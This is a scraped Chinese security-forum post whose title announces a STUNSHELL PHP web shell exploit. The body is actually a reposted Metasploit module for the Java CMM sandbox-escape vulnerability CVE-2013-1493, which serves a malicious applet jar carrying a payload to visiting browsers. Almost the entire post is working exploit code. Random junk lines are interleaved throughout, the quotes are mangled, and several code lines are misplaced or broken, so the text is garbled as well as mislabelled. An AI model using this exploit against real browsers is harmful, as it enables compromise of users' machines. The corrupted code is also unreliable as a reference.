中国网络渗透测试联盟
标题:
STUNSHELL PHP Web Shell远程执行代码
[打印本页]
作者:
admin
时间:
2013-4-4 17:31
标题:
STUNSHELL PHP Web Shell远程执行代码
##
( q5 f+ u. j' a8 A
# e8 ~* [! k0 `- c$ d# x9 b! w
# This file is part of the Metasploit Framework and may be subject to
7 G6 \2 j+ l% `# E( s/ F( j
# redistribution and commercial restrictions. Please see the Metasploit
, x/ T0 t9 ]- o+ ^) N6 x% S
# web site for more information on licensing and terms of use.
) r0 ~8 H: w; M" D
#
http://metasploit.com/
F$ I0 n* j4 s. S& x5 l; a
##
1 U! }: }4 X* N4 V: p) g
require ‘msf/core’
$ `, _+ B* ]7 T
require ‘rex’
4 t4 C* v1 ?* o1 \. j* e0 Y
class Metasploit3 < Msf::Exploit::Remote
/ o" R9 \' j0 H! f" m3 t9 K, X* c
Rank = NormalRanking
- a2 y4 f) \# p8 i
include Msf::Exploit::Remote::HttpServer::HTML
! d I) R# R; w2 }5 y: G. t5 T
include Msf::Exploit::EXE
4 Y& O) k! J2 d1 t- b& _
include Msf::Exploit::Remote::BrowserAutopwn
8 f. P7 B6 G+ w' X$ r) S- g q# G
autopwn_info({ :javascript => false })
7 `$ }( R% J& t6 i: x
def initialize( info = {} )
$ c# e6 y$ { @% t: ^
super( update_info( info,
. G( |. N9 U8 n' P, T* w& |
‘Name’ => ‘Java CMM Remote Code Execution’,
( z( _/ Q' S0 S. F
‘Description’ => %q{
6 j; f; |+ J: g% h' o- N; I' ^ z9 @
This module abuses the Color Management classes from a Java Applet to run
* T+ L- L# }% b2 J9 e/ G2 Y
arbitrary Java code outside of the sandbox as exploited in the wild in February
! H( W' m. G' {; z0 P
and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
1 \1 A: i Q6 h: P( x! I
and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
$ b. {" @% X) Q1 e2 S' P
systems. This exploit doesn’t bypass click-to-play, so the user must accept the java
* j6 i' @# X, T, N& Z. C3 ^
warning in order to run the malicious applet.
3 ~) S; P. ~0 ]/ S# [6 K! M. o
},
7 U/ h+ k( K& e# G
‘License’ => MSF_LICENSE,
/ Q# [0 o$ }8 [0 \$ q
‘Author’ =>
# K6 W |* j; P' @8 i' a
'Unknown', # Vulnerability discovery and Exploit
, O4 O) X- l3 ^1 e' D5 k
'juan vazquez' # Metasploit module (just ported the published exploit)
+ d: ]: E7 C2 a1 n! _! c
],
3 N; ]6 @/ K5 V& R- b! T
‘References’ =>
1 \/ Q" G4 N4 x5 P- D& o
[
g, j% Q+ v6 ]& F6 a( R
[ 'CVE', '2013-1493' ],
5 n" L* R+ g: {/ O1 g, u# @- [
[ 'OSVDB', '90737' ],
1 a& x3 o8 t0 g4 Y( O$ e
[ 'BID', '58238' ],
7 F) S! s; F( Q0 O% h3 H2 N9 Z
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
# k/ B0 _5 e0 G5 S
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
6 W. F* f( M! Z
[ 'URL', 'http://pastie.org/pastes/6581034' ]
) _% e8 M" U" ?* K; g" ]& x, R( H
],
2 w* k9 ~; T- E: o! A" N @
‘Platform’ => [ 'win', 'java' ],
+ l/ H8 S% p: r3 x
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
5 B# _" O0 P3 V7 Q& E
‘Targets’ =>
& J7 m4 ?& k# h) w6 l1 z
[
& \/ H( O' J% S, K9 f8 r- [* K
[ 'Generic (Java Payload)',
1 b) H) m% p% c. X: e [' w
{
7 D3 ? o: g" r Y0 I; Y
'Platform' => 'java',
0 S3 Q- l6 h* a
'Arch' => ARCH_JAVA
6 j; ^9 D: x% M: ^9 z4 b
}
; r( r3 q2 h4 X- {; T! C0 s
],
2 L4 H8 \2 o6 O, Z- K( m# x9 ~' d
[ 'Windows x86 (Native Payload)',
8 Z" o6 C% V7 ?. l
{
! G2 Y$ I; F- u8 L
'Platform' => 'win',
# z" [/ D3 H# L
'Arch' => ARCH_X86
' G$ Y+ N; {4 e7 H* ~' n
}
3 U- A- c" a/ y. M0 ]- C0 T+ h
]
, V/ T5 D9 K2 M- c: o" B, `
],
9 V9 j- O" ^) m
‘‘DisclosureDate’ => ‘Mar 01 2013′
) e& e$ T4 K5 ~" s
))
! m: M! i, i' C3 x, v1 Y z+ V- W
end
" {. D( ?0 Q2 {% L. J% z$ i$ v
def setup
( q/ X7 e' [0 n1 ~) Z7 _+ ]
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
- A# x R" J( W- X* g* w1 }
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
' m: b: @, T( P9 a# T N4 G+ p2 J3 X9 ^
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
[2 l" B& N) k9 e3 \6 |
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
2 t2 g6 y4 Y% z
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
& c1 v6 L* \; Z$ Q
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
) w/ O. O# [ N% O% a
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
2 i/ [' s* I; D# N& T
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
- K1 @1 q" p# N u2 g
@init_class_name = rand_text_alpha(“Init”.length)
! I5 H+ P' m+ P
@init_class.gsub!(“Init”, @init_class_name)
: `" r5 j4 _( s6 J1 K& W+ D/ ~& z
super
7 o9 x2 l, @+ K {" h3 I
end
, m: `; w8 G' P+ d# R5 H
def on_request_uri(cli, request)
4 y4 H4 V* f8 q' e6 H
print_status(“handling request for #{request.uri}”)
& S' y5 `3 p e+ i7 O/ k
case request.uri
/ \3 e& N$ j4 w4 W/ M
when /\.jar$/i
* e: J; O f8 B7 Q$ H6 a
jar = payload.encoded_jar
6 X, m! F& \( ~: ?: W/ ~+ |. R& g
jar.add_file(“#{@init_class_name}.class”, @init_class)
) J, n# \- u- t- m1 A4 u. i
jar.add_file(“Leak.class”, @leak_class)
0 z( Z% h* W) k4 K! J! g" E
jar.add_file(“MyBufferedImage.class”, @buffered_image_class)
0 F# }: o3 Q% C& t
jar.add_file(“MyColorSpace.class”, @color_space_class)
' F2 c6 Z7 w- n2 l7 ~: b/ C
DefaultTarget’ => 1,
7 W& j& d( j0 _( q: g& w1 c3 j! ^/ o
metasploit_str = rand_text_alpha(“metasploit”.length)
& x: y+ }. W' `. ^2 n3 B
payload_str = rand_text_alpha(“payload”.length)
( z! c8 R/ [2 d
jar.entries.each { |entry|
# z$ R; @# M6 W1 @ T0 k
entry.name.gsub!(“metasploit”, metasploit_str)
I! R0 G0 z& j& ^! C' k
entry.name.gsub!(“Payload”, payload_str)
! p3 X$ c1 {+ `1 z0 |. V
entry.data = entry.data.gsub(“metasploit”, metasploit_str)
8 R5 E: _% X- k* M* \/ o* P* F
entry.data = entry.data.gsub(“Payload”, payload_str)
5 C8 R3 e# z& f: p9 u7 E
}
8 d! P- d0 ]' A' }
jar.build_manifest
" {9 |$ d! ], q* ?: j3 c
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
4 ?$ M+ ~1 H2 ? f6 v$ U/ a
when /\/$/
- e- D# I2 p- I5 E+ G7 ^1 h
payload = regenerate_payload(cli)
^2 }2 y, ^; F. `6 C
if not payload
W$ X/ d, u8 w* G1 m
print_error(“Failed to generate the payload.”)
6 b0 D4 e, I4 I+ M$ L- c1 x$ j, e
send_not_found(cli)
9 | e; N% Z* M+ w1 y& U5 x
return
2 Y2 l5 T9 H B, Z! B3 e/ P
end
, W* V: b4 `* R( D% J' }9 H
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
+ x- O$ I/ ^) U; Z& |& e& x
else
/ t- Z# V5 c' \! h% ~7 @# |" ?! S
send_redirect(cli, get_resource() + ‘/’, ”)
- l- r* y# o& ~
end
, b4 |5 o$ L) L& M3 ]4 |
end
/ U3 s8 @1 S) k& S8 F5 p$ L% _
def generate_html
) N' q+ |) o" H5 P0 B. l
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|
: e1 q& S: }' ~ A
html += %Q|<body><center><p>Loading, Please Wait…</p></center>|
+ H/ ?+ c/ } u
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
3 J+ q/ b0 o! h. X/ R8 S' Z
html += %Q|</applet></body></html>|
. y( Y" A, s+ Z
return html
' O: [3 G+ a) x7 ^6 r7 ?' a- J1 T
end
0 E/ w( \0 _( M5 T- z" r
end
, ]. h! F: g8 W; i. w9 V* a# ?$ P
end
1 u. J+ Z P. V
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2